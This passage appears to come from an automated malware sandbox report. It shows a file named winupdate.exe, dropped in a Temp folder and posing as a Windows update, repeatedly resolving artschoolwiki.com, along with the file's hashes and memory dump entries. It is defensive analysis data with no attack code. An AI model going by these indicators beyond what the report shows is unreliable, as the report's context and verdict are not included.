    21.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

  • 8.8.8.8:53
    artschoolwiki.com
    dns
    winupdate.exe
    63 B
    136 B
    1
    1

    DNS Request

    artschoolwiki.com

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\winupdate.exe

    Filesize

    61KB

    MD5

    735eb6514d76b7cc638a3c77a2325f85

    SHA1

    bcb05156b1fe98070a69a375a8b76f1c6df69241

    SHA256

    1310165efd055be367fd5372ab0cfe8955d00c6d083cee17788b5fa27ec4a1e1

    SHA512

    ec6f85aa4e462e42660d860026680650fef2598ff0caef7cabc738b7f077914f33f2a4e7c63cddddb9d38f48a2a381574f3cd9e2c04dc211230e6b4c24f2230d

  • memory/832-11-0x0000000000500000-0x0000000000512000-memory.dmp

    Filesize

    72KB

  • memory/3092-0-0x0000000000500000-0x0000000000512000-memory.dmp

    Filesize

    72KB

  • memory/3092-1-0x0000000000501000-0x0000000000502000-memory.dmp

    Filesize

    4KB

  • memory/3092-10-0x0000000000500000-0x0000000000512000-memory.dmp

    Filesize

    72KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.